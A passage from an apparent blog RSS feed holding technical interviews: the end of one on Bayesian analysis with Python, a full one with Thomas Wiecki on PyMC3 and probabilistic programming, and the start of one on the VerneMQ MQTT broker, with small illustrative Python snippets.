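a_post, b_post = update_beta(1, 1, 7, 3)
posterior_mean = a_post / (a_post + b_post)
print(a_post, b_post, round(posterior_mean, 3))  # 8 4 0.667
```

&lt;p&gt;For models without such closed-form posteriors, this is the step that tools like PyMC3 carry out numerically, via sampling instead of arithmetic.&lt;&#x2F;p&gt;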
&lt;h4 id=&quot;why-do-you-like-working-with-data&quot;&gt;Why do you like working with data?&lt;&#x2F;h4&gt;
&lt;p&gt;I am not sure I “like” working with data; working with data is hard, and data collection, wrangling, cleaning and processing are generally time consuming. Data &lt;em&gt;per se&lt;&#x2F;em&gt; is not important; what really matters is understanding phenomena, solving problems and designing better tools to solve problems. What happens is that data is essential to all these tasks. To answer any question in a scientific way you will need data at some point; for some problems you can progress a lot with just theory, but eventually you will need some data. The only scientific discipline that can avoid using data is pure mathematics, and for that reason many people do not think that mathematics is a scientific discipline, or if so they classify it as a logical science and not a factual one.&lt;&#x2F;p&gt;
&lt;p&gt;Everyone is talking about the data deluge, and thus it is easy to miss that data is produced by someone and that producing data is not always easy or cheap. Even when we have access to pre-existing data it may need further processing, or it may not be suitable to answer our questions, and thus we may need to generate data from scratch. In general, answering specific questions requires generating specific data under specific conditions. Just a few years ago many computational biologists and bioinformaticians believed that by extracting biological information from scientific journals and databases we would be able to build very reliable models of the cell. It turns out that while this is a good idea, it is not as easy as it sounds and not applicable to every question. Papers are behind paywalls and written in formats that are not easy to analyze programmatically, experiments are performed under so many different conditions that integrating the information coherently is closer to a bad breakup than a romantic dinner, some experimental results are too noisy or the experimental design is flawed, observations can be contradictory, information in databases needs to be further curated, etc.&lt;&#x2F;p&gt;
&lt;p&gt;To many people Data Science has put “data” in the spotlight, but science has always been data-driven. Charles Darwin was responsible for one of the most elegant scientific theories, and one of the most misrepresented ones. He spent years and years collecting data, not for the sake of having data but to try to make sense of the diversity and complexity of living organisms. Nowadays evolutionary biologists still spend a lot of time producing and gathering data from carefully designed observations, experiments and simulations in order to refine evolutionary ideas.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-the-advantages-and-disadvantages-of-using-python-over-other-languages-for-data-analysis&quot;&gt;What are the advantages and disadvantages of using Python over other languages for data analysis?&lt;&#x2F;h4&gt;
&lt;p&gt;One of the reasons I use Python is that it is a general purpose language, and while I spend a lot of time on data-analysis related stuff I also use Python to solve other types of problems. I learned to program during my PhD without formal training, but with the help of great books like Think Python by Allen Downey and A Primer on Scientific Programming with Python by Hans Petter Langtangen, and I was also helped in many different ways by a large, welcoming and enthusiastic Python community.&lt;&#x2F;p&gt;
&lt;p&gt;At the time of my PhD most of my “coding” was about automating boring stuff and gluing together specific scientific packages in order to perform molecular simulations and solve very, very simple data-analysis problems. I used to do that using a collection of poorly documented (and probably poorly written) bash scripts. With time this approach turned out to be too restrictive, so I tried to learn Fortran and C, but I found them overcomplicated for most of the tasks I wanted to solve at the moment, and only very useful for a subset of them… until I found Python! As someone said, Python is not the best programming language for almost any task but it is good enough for most of them, as I would discover with the passage of time and with every new project that involved Python. One super tedious task for me at that moment was updating plots. I used a software package with a GUI (an open source clone of a reeeeeally expensive proprietary scientific plotting program). Updating plots after re-running a simulation, noticing a mistake, or getting feedback from my advisors or peers was a lot of work. I do not remember the exact moment I found matplotlib, but it was a game-changer for me and one of the reasons to learn even more Python.&lt;&#x2F;p&gt;
&lt;p&gt;Another epiphany was when I re-wrote a small piece of software a colleague kindly passed to me. Like me, my colleague was a non-computer-scientist. This code was a collection of bash scripts and a Fortran main program. I started with the bash scripts: instead of running several bash scripts, I unified all of them into a collection of coherent Python functions. This already made my workflow easier and I was already super happy. Then I decided to change the Fortran code; at first this was mainly an exercise to challenge myself to learn more NumPy and SciPy. After many attempts to get it right (I never truly learned Fortran) I got a working Python version of the code. This code was not only much shorter, easier to read and more modular, but to my surprise it was also 10x faster! Most of the speed-up came from replacing a lot of Fortran code with a SciPy call and a couple of NumPy array operations. And this was an important lesson for me: do not re-invent the wheel, there are many specialized, well-tested, efficient routines out there, use them! Because while Python is &lt;em&gt;slow&lt;&#x2F;em&gt;, not being a proficient programmer in a &lt;em&gt;fast&lt;&#x2F;em&gt; language like Fortran or C can be even slower!&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-aspects-of-doing-bayesian-analysis-with-python-do-you-feel-are-tricky-to-get-past&quot;&gt;What aspects of doing Bayesian Analysis with Python do you feel are tricky to get past?&lt;&#x2F;h4&gt;
&lt;p&gt;For newcomers, getting a fully functional Python environment can sometimes be tricky. Anaconda (a scientific Python distribution) and conda (a package manager) have helped a lot to get things installed properly, especially for Windows users.&lt;&#x2F;p&gt;
&lt;p&gt;When I show PyMC3 code to people, most of them seem surprised by how much you can do with a few lines of code. I even get responses like “that’s not programming”, which in a sense I agree with: it is just using a programming language to give instructions to a computer and get things done ;-) The challenge when using PyMC3 is then not so much on the programming side but on the mental-modeling side; at first most people have problems figuring out how to express their problems in terms of a probabilistic model. This is a matter of practice and the creative part of the job. In the book I tried to show many examples of different models to help ease this transition to thinking probabilistically. This is something that needs practice; knowing that most pop songs are built from the same progression of 3 to 4 chords does not automatically make you a pop star.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;your-take-on-the-data-analysis-environment-with-regards-to-innovations-in-it-the-knowledge-and-skills-gap-and-software-development-how-do-you-think-the-tech-landscape-is-changing&quot;&gt;Your take on the data analysis environment with regards to innovations in it, the knowledge and skills gap, and software development. How do you think the tech landscape is changing?&lt;&#x2F;h4&gt;
&lt;p&gt;My impression is that we now have something that was completely unimagined just a couple of decades ago: the popularization of very powerful computational methods. One of the side effects of the computer revolution is that any person with a modest understanding of a programming language like Python now has access to a plethora of powerful computational methods for data analysis, simulations, and other complex tasks. I am totally in favor of this; it is one of my motivations to work on Open Source Software projects and to give free courses at the University. But I also recognize that this should be an invitation to us, as a community, to be extra careful about these methods, not only to be able to apply them correctly from a technical point of view and to avoid making false claims, but also from an ethical and democratic perspective. Otherwise we face the risk of giving too much control over important decisions to an increasingly reduced group of rich and powerful people and corporations, something that I am afraid is already happening, with disastrous consequences for those of us who are not part of the super-rich club. To turn this popularization of methods into a true democratization we need not only to make the methods accessible; we also need to make other resources widely available. If the majority of the data-generating processes, the data itself and the most powerful hardware are controlled by a small group, then we are not aiming for a true democracy; we are just spending a lot of resources on training a highly skilled workforce to serve the interests of a few, and that is just a technocratic version of an oligarchy.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Thomas Wiecki about Probabilistic programming and PyMC</title>
          <pubDate>Fri, 16 Nov 2018 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/inteview-with-thomas-wiecki-about-probabilistic-programming-and-pymc/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/inteview-with-thomas-wiecki-about-probabilistic-programming-and-pymc/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/inteview-with-thomas-wiecki-about-probabilistic-programming-and-pymc/">&lt;h3 id=&quot;inteview-with-thomas-wiecki-about-pymc-and-probabilistic-programming&quot;&gt;Interview with Thomas Wiecki about PyMC and probabilistic programming&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-Ke59y1Iyox6MUJ1HpEkLyg.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;“A colleague of von Neumann and Ulam, Nicholas Metropolis, suggested using the name &lt;strong&gt;Monte Carlo&lt;&#x2F;strong&gt; , which refers to the Monte Carlo Casino in Monaco where Ulam’s uncle would borrow money from relatives to gamble”&lt;&#x2F;p&gt;
&lt;p&gt;After studying and working with distributed systems, my interests drifted into data science, artificial intelligence, machine learning and, more recently, statistics. After a while I found I really liked applying what I had learnt to finance. That is how I learnt about probabilistic programming and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.pymc.io&#x2F;&quot;&gt;PyMC&lt;&#x2F;a&gt; while reading Thomas Wiecki’s posts on the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.quantopian.com&#x2F;&quot;&gt;Quantopian blog&lt;&#x2F;a&gt;. That’s why we decided to interview Thomas. I hope you enjoy this interview as much as we did.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;What is probabilistic programming?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Probabilistic Programming is a paradigm that allows the expression of Bayesian statistical models in computer code. Imagine you run an A&#x2F;B test and want to know which version is better. With a few lines of code you could build a model with 2 conversion rate parameters that are linked to the data you have observed so far. So far that’s only model specification. The real power in probabilistic programming comes from the inference algorithms, which have become so powerful that they usually work very well no matter what model you throw at them. So all you have to do is build the model, hit the inference button and analyze your outputs. In this example, the outputs will be the estimates of the conversion rates for both conditions as well as the uncertainty in those estimates. From there it is trivial to extract statements such as “with x% probability, version A has a higher conversion rate than version B”.&lt;&#x2F;p&gt;
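&lt;p&gt;PyMC3’s inference machinery does the heavy lifting in practice, but the core of that final statement can be sketched with the Python standard library alone. The snippet below is our illustration, not PyMC3 code, and the counts are invented: with a uniform Beta(1, 1) prior, each version’s conversion rate has a Beta posterior we can sample directly, and comparing paired draws estimates the probability that B beats A.&lt;&#x2F;p&gt;

```python
import random

random.seed(0)

# Invented example data: conversions out of total views for two versions.
conv_a, n_a = 48, 1000
conv_b, n_b = 56, 1000

def posterior_draws(conversions, trials, n_draws=20000):
    # With a Beta(1, 1) prior, the posterior over a conversion rate
    # is Beta(conversions + 1, trials - conversions + 1).
    return [random.betavariate(conversions + 1, trials - conversions + 1)
            for _ in range(n_draws)]

draws_a = posterior_draws(conv_a, n_a)
draws_b = posterior_draws(conv_b, n_b)

# Fraction of paired posterior draws in which B's rate exceeds A's.
p_b_better = sum(b > a for a, b in zip(draws_a, draws_b)) / len(draws_a)
print(f"P(rate_B beats rate_A) is roughly {p_b_better:.2f}")
```

&lt;p&gt;A real PyMC3 model would declare the same structure declaratively and let HMC handle models far beyond this conjugate special case.&lt;&#x2F;p&gt;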
&lt;p&gt;This is a really simple example but these models can get staggeringly complex, depending on the problem you are trying to solve.&lt;&#x2F;p&gt;
&lt;p&gt;In general, whenever you have a problem where uncertainty plays a big role, where there is structure to be exploited (e.g. hierarchical), or you have prior knowledge you want to include in the model, probabilistic programming is the tool of choice.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is PyMC?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;PyMC3 is such a probabilistic programming framework. It is different from most previous frameworks in that it does not require you to write models in a domain-specific language; instead, models are written in plain Python. It features state-of-the-art inference algorithms and diagnostics, flexible support for Gaussian Processes, model comparison metrics, and has a very active community.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why was PyMC created? What is the difference with other projects like Edward and Stan?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;PyMC3 is a result of the desire to implement next-generation Hamiltonian Monte Carlo (HMC) samplers, which are vastly superior to previous MCMC algorithms. Contrary to those previous algorithms, HMC requires gradients to be computed. Theano was the first library that allowed one to build a compute graph in Python from which gradients can be computed automatically. John Salvatier went through various designs until he came up with the core design that would constitute PyMC3. While HMC is the core motivation, Theano provides many other benefits to PyMC3, like high performance due to graph optimizations and compilation to CPU and GPU, while keeping the model definition and code-base pure Python.&lt;&#x2F;p&gt;
&lt;p&gt;The biggest difference to Stan is that Stan is written in C++ with a custom DSL to define models. This is great as it allows interfaces from various languages, but it comes at the cost of a more complex code-base, and of having to learn a DSL rather than being able to use Python. Having said that, PyMC3 is hugely inspired by Stan in many ways.&lt;&#x2F;p&gt;
&lt;p&gt;Edward is a more recent PPL built on TensorFlow, so in that way it is quite similar to PyMC3 in that you can construct models in pure Python. Its focus is more on variational inference (which can also be expressed in the same PPL), scalability and deep generative models. I don’t think it is actively developed anymore, so anyone interested should take a look at TensorFlow Probability instead.&lt;&#x2F;p&gt;
&lt;p&gt;In general, I would say that if you are a ML researcher developing new deep networks or variational inference algorithms, use TensorFlow Probability; if you are an R user with a statistical background, use Stan; if you are a Data Scientist most comfortable in Python, use PyMC3.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Could you please tell us about real world examples where PyMC is being used?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;PyMC3 is widely used in academia, there are currently close to 200 papers using PyMC3 in various fields, including astronomy, chemistry, ecology, psychology, neuroscience, computer security, and many more. It is also used to solve various business problems by large and small companies. One common use case I have heard is for A&#x2F;B testing, which makes sense as uncertainty plays a big role. Another problem well solved by PyMC3 is supply chain optimization.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How does PyMC differ from other probabilistic programming languages (eg Figaro, Church, Anglican)?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;These more academic PPLs really push the envelope of what is possible to do in this framework. They are Turing complete and thus there is little that cannot be done. Often these high standards on theoretical guarantees and purity of the PPL come at the cost of usability and performance. PyMC3, on the other hand, focuses on solving 80% of the problems encountered in practice as succinctly and efficiently as possible.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How far is support for Deep Learning methods integrated into PyMC?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I wrote a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;twiecki.github.io&#x2F;blog&#x2F;2016&#x2F;06&#x2F;01&#x2F;bayesian-deep-learning&#x2F;&quot;&gt;couple&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;twiecki.github.io&#x2F;blog&#x2F;2016&#x2F;07&#x2F;05&#x2F;bayesian-deep-learning&#x2F;&quot;&gt;of&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;twiecki.github.io&#x2F;blog&#x2F;2017&#x2F;03&#x2F;14&#x2F;random-walk-deep-net&#x2F;&quot;&gt;blog&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twiecki.github.io&#x2F;blog&#x2F;2018&#x2F;08&#x2F;13&#x2F;hierarchical_bayesian_neural_network&#x2F;&quot;&gt;posts&lt;&#x2F;a&gt; exploring these topics. As deep learning was Theano’s original purpose, we can tap into a lot of that functionality and extend deep nets in interesting ways. I have not seen this explored much elsewhere, however. PyMC4 will be based on TensorFlow Probability (TFP), which definitely has a strong focus on deep generative models, so this type of model will be much easier to build, and TFP’s powerful inference algorithms will also allow it to scale.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the tradeoffs of using Variational Inference vs standard Markov chain Monte Carlo with regards to finance?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Variational inference is generally much faster at the cost of a less accurate approximation of the posterior. In finance you are often operating under razor-thin margins so everything counts. My recommendation is to thus use MCMC.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is there support for modelling Generalized Extreme Value distributions in PyMC3?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I haven’t come across that one yet but it looks like it should be fairly easy to add. We certainly have the Gumbel and Weibull distributions, which are special cases of it.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How is model criticism implemented?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;There is pymc3.sample_posterior_predictive(), which allows you to generate new data from your model which you can then compare to your original data to test if the model captures the important properties of your data. See &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.pymc.io&#x2F;notebooks&#x2F;posterior_predictive.html&quot;&gt;https:&#x2F;&#x2F;docs.pymc.io&#x2F;notebooks&#x2F;posterior_predictive.html&lt;&#x2F;a&gt; for more information.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How do you use PyMC3 at Quantopian?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We use it in various places, but most critical for portfolio weighting. At Quantopian our challenge is to evaluate return streams of trading algorithms over limited time periods to decide if they have an edge in the market or just got lucky over a certain time-period. Thus, correctly quantifying uncertainty is critical. The return streams themselves have many challenging characteristics on top of that which are important to consider when trying to select them. Some key characteristics are that over time, they often change volatility; the “edge” they have can also vary over time; and they can be correlated with other strategies you are considering.&lt;&#x2F;p&gt;
&lt;p&gt;Adrian Seyboldt built a fairly sophisticated model which takes all these properties (and more) into account and ends up having tens of thousands of parameters. The incredible thing about PyMC3 and HMC is that this hugely complex model can be fit in well under an hour. But the really business critical advantage is that once this model is fitted, correctly attributing all the uncertainty in these various characteristics, we can put everything into an optimizer to give us the optimal portfolio. This way, we solve the algorithm selection &lt;em&gt;and&lt;&#x2F;em&gt; portfolio weighting problem in one go. Before, there was a lot of discretionary leeway in what constitutes enough evidence that an algorithm should be turned on or off leading to suboptimal decisions.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Has PyMC been ever used to price financial derivatives?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Not to my knowledge, but I would not be surprised if it has been used for that. People come up to me constantly at conferences and tell me about the cool domain problems they solved with PyMC3 at their company. I love hearing about this because it is hard to assess how many people use your software and for what purposes.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How big a problem is autocorrelation in sampling financial (tail risk, pricing) distributions?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It is definitely an important source of risk that is often ignored when applying frequentist statistics to finance, as the normality assumption is baked into most tests. Using probabilistic programming we can model changes in volatility like the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.pymc.io&#x2F;notebooks&#x2F;stochastic_volatility.html&quot;&gt;stochastic volatility model&lt;&#x2F;a&gt; does. Alternatively one can also use a Student-T distribution for the likelihood which allows for heavier tails.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What could be improved in PyMC?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think the documentation and website need more work to make it easier to find things and to be more beginner friendly. We also recently spun the plotting code out into a separate project called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arviz-devs.github.io&#x2F;arviz&#x2F;&quot;&gt;ArviZ&lt;&#x2F;a&gt;. In the upcoming release, we will slowly transition to using that library.&lt;&#x2F;p&gt;
&lt;p&gt;Our next major project will be PyMC4, which will be based on TensorFlow Probability. TFP provides a great core architecture and allows us to put more focus on usability, and we have some interesting ideas for an improved model-creation API. In the meantime, maintenance of Theano is going to be taken over by the PyMC development team as the original authors are moving on.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is the project looking for contributors?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Yes, we constantly have new contributors show up on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;pymc-devs&#x2F;pymc3&quot;&gt;GitHub&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;discourse.pymc.io&quot;&gt;discourse&lt;&#x2F;a&gt;, and our list of core developers keeps growing. We also have a summit coming up where all developers will meet in London to hack on PyMC4.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What books or MOOCs would you recommend for a software dev that wants to learn more about probability and statistics?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;camdavidsonpilon.github.io&#x2F;Probabilistic-Programming-and-Bayesian-Methods-for-Hackers&#x2F;&quot;&gt;Probabilistic Programming for Hackers&lt;&#x2F;a&gt; is a great read. For a more formal introduction I like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.indiana.edu&#x2F;~kruschke&#x2F;DoingBayesianDataAnalysis&#x2F;&quot;&gt;Kruschke’s puppy book&lt;&#x2F;a&gt; (which was &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JWarmenhoven&#x2F;DBDA-python&quot;&gt;ported to PyMC3&lt;&#x2F;a&gt;) as well as Osvaldo Martin’s (who is a PyMC core developer) book on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.packtpub.com&#x2F;big-data-and-business-intelligence&#x2F;bayesian-analysis-python-second-edition&quot;&gt;Bayesian Analysis with Python&lt;&#x2F;a&gt;. Also if you find that screencasts are a good way to learn — Peadar Coyle (who is a PyMC core developer) put together a course called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.probabilisticprogrammingprimer.com&#x2F;&quot;&gt;Probabilistic Programming Primer&lt;&#x2F;a&gt;, he also looks at other PPLs including Pyro (from Uber based on Pytorch) and Rainier (a Scala based PPL). Finally, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;xcelab.net&#x2F;rm&#x2F;statistical-rethinking&#x2F;&quot;&gt;Statistical Rethinking&lt;&#x2F;a&gt; (ported to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;pymc-devs&#x2F;resources&#x2F;tree&#x2F;master&#x2F;Rethinking&quot;&gt;PyMC3&lt;&#x2F;a&gt;) is a fantastic resource as well.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>There’s more to life than HTTP: VerneMQ a high-performance and distributed MQTT broker</title>
          <pubDate>Wed, 05 Sep 2018 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/theres-more-to-life-than-http-vernemq-an-mqtt-broker/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/theres-more-to-life-than-http-vernemq-an-mqtt-broker/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/theres-more-to-life-than-http-vernemq-an-mqtt-broker/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-vHHvudyYcHEpI5d52doOcQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;At &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lambdaclass.com&#x2F;&quot;&gt;LambdaClass&lt;&#x2F;a&gt; and on our blog &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&#x2F;&quot;&gt;This is not a Monad tutorial&lt;&#x2F;a&gt; we are big fans of exploring new topics: different operating systems, platforms, languages and libraries&#x2F;frameworks. Lately we have been talking in our company about exploring new subjects like protocols.&lt;&#x2F;p&gt;
&lt;p&gt;There is a whole generation of developers that has only worked with HTTP, ReST and JSON. While a partial improvement over previous technologies, it has created a protocol monoculture. There are situations where other protocols are better suited but many of the young bloods don’t even know they exist.&lt;&#x2F;p&gt;
&lt;p&gt;MQTT is the first protocol we want to dive into. For us VerneMQ (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vernemq.com&#x2F;&quot;&gt;https:&#x2F;&#x2F;vernemq.com&#x2F;&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;erlio&#x2F;vernemq&quot;&gt;https:&#x2F;&#x2F;github.com&#x2F;erlio&#x2F;vernemq&lt;&#x2F;a&gt;) is one of the best MQTT brokers implementations we know and it is familiar to us since it is implemented in Erlang. The questions were answered by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;frescosecco&quot;&gt;André Fatton&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;der_graf&quot;&gt;André Graf&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;larshesel&quot;&gt;Lars Hesel Christensen&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;What is MQTT?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
MQTT was developed by Andy Stanford-Clarke (IBM) and Arlen Nipper (Cirrus Link) in 1999 as a light-weight protocol efficient in terms of bandwidth and resource usage. In fact one of the original use cases was to send telemetry back from oil-pipelines in remote areas where transmitting data is expensive and service windows are far between. The defining feature of MQTT is that it is a dynamic pub&#x2F;sub type paradigm where clients need to actively subscribe to a topic to receive messages published to it, thus decoupling producers and consumers completely. MQTT also supports various quality of service levels as well as persisted sessions and a few other handy things.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is VerneMQ?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
VerneMQ is an open source (Apache License version 2) MQTT broker supporting the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.oasis-open.org&#x2F;mqtt&#x2F;mqtt&#x2F;v3.1.1&#x2F;mqtt-v3.1.1.html&quot;&gt;MQTT 3.1.1&lt;&#x2F;a&gt; standard as well as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.oasis-open.org&#x2F;mqtt&#x2F;mqtt&#x2F;v5.0&#x2F;mqtt-v5.0.html&quot;&gt;MQTT 5.0&lt;&#x2F;a&gt; (though, to be fair MQTT 5.0 support has not yet been merged to master at the time of writing, but should be within a few days). Besides being just another MQTT broker, VerneMQ was built from the start to be a distributed MQTT broker with high scalability in mind.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why would somebody use MQTT instead of HTTP 2 or WebSocket?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
MQTT, HTTP&#x2F;2 and WebSockets all have their strengths and weaknesses. HTTP is a request&#x2F;reply type protocol, while MQTT is a publish&#x2F;subscribe type protocol. So if all you really need is request&#x2F;reply, then MQTT might not be the right choice for the use case. But if the messaging patterns are more complex, such as fan-in and fan-out, and none or only a small part is request&#x2F;reply, then MQTT might be an appropriate choice. What MQTT brings to the table is decoupling of the producers and consumers and all the flexibility that comes with that, as well as a well defined routing mechanism based on subscriptions with wildcards. In an HTTP or WebSocket context one would have to build a custom routing scheme, which may of course be better suited for the job than something as general as MQTT. On the other hand, if the desired features are supported by MQTT, then MQTT has a huge advantage in that it is an open (and royalty free) standard and high quality client libraries are available in pretty much any programming language one could imagine.&lt;&#x2F;p&gt;
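&lt;p&gt;That routing mechanism is worth a concrete look. The function below is a hypothetical, simplified matcher for MQTT subscription filters, covering the ‘+’ (single level) and ‘#’ (multi level) wildcards and ignoring some corner cases of the spec (for instance, ‘#’ also matching its parent level):&lt;&#x2F;p&gt;

```python
def topic_matches(filter_str, topic):
    """Check an MQTT topic against a subscription filter.

    '+' matches exactly one topic level; '#' matches any number of
    remaining levels and is expected as the last level of the filter.
    """
    f_levels = filter_str.split("/")
    t_levels = topic.split("/")
    for i, f in enumerate(f_levels):
        if f == "#":
            return True          # '#' swallows the rest of the topic
        if i >= len(t_levels):
            return False         # filter has more levels than the topic
        if f != "+" and f != t_levels[i]:
            return False         # a literal level must match exactly
    return len(f_levels) == len(t_levels)

print(topic_matches("sensors/+/temperature", "sensors/kitchen/temperature"))  # True
print(topic_matches("sensors/#", "sensors/kitchen/humidity"))                 # True
print(topic_matches("sensors/+", "sensors/kitchen/humidity"))                 # False
```

&lt;p&gt;A broker evaluates something like this for every subscription when routing a published message, which is why subscription state must be known cluster-wide in a distributed broker.&lt;&#x2F;p&gt;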
&lt;p&gt;&lt;strong&gt;Does it have an overlap with other protocols like AMQP (implemented by RabbitMQ for example)?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Yes, essentially both AMQP (speaking for the 0.9.1 version) and MQTT implement a publish&#x2F;subscribe messaging pattern. Both protocols rely on intermediate queuing&#x2F;store-and-forward techniques to reduce or eliminate message loss in case a client loses the connection to the broker. The main conceptual difference is that in MQTT one client (identified by a ‘unique’ client id) has one TCP connection to the broker and only a single “queue”. As a consequence, even if a client has multiple subscriptions, all messages end up in the same queue. In contrast, with AMQP a queue is a resource on the broker and is decoupled from the client; multiple clients can consume the same queue, e.g. for load balancing purposes. So a client can create many queues and decide if and when to consume messages. Moreover, an AMQP connection, which is just a TCP connection, is multiplexed via logical channels, enabling the development of highly performant consumers and publishers.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you decide to implement another MQTT broker?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
